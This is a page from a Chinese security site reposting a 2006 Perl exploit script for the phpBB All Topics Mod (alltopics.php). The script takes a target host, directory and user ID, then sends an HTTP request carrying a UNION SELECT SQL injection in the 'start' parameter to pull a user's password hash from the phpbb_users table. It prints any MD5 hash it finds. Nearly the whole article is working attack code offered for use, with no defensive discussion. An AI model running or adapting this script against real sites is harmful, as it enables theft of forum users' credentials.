首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit
来源:http://www.phpbbhacks.com 作者:bd0rk 发布时间:2006-08-24  

#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod: http://www.phpbbhacks.com/download/2821 +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MercuryBoard <= 1.1.4 (User
·Integramod Portal <= 2.x (f
·2wire Modems/Routers CRLF Deni
·VistaBB <= 2.x (functions_m
·MDaemon POP3 Server < 9.06
·MDaemon POP3 Server < 9.06
·Mozilla Firefox <= 1.5.0.6
·AlberT-EasySite <= 1.0a5 (P
·Simple Machines Forum <= 1.
·iziContents <= RC6 GLOBALS[
·Solaris 8 / 9 (/usr/ucb/ps) Lo
·CMS Frogss <= 0.4 (podpis)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved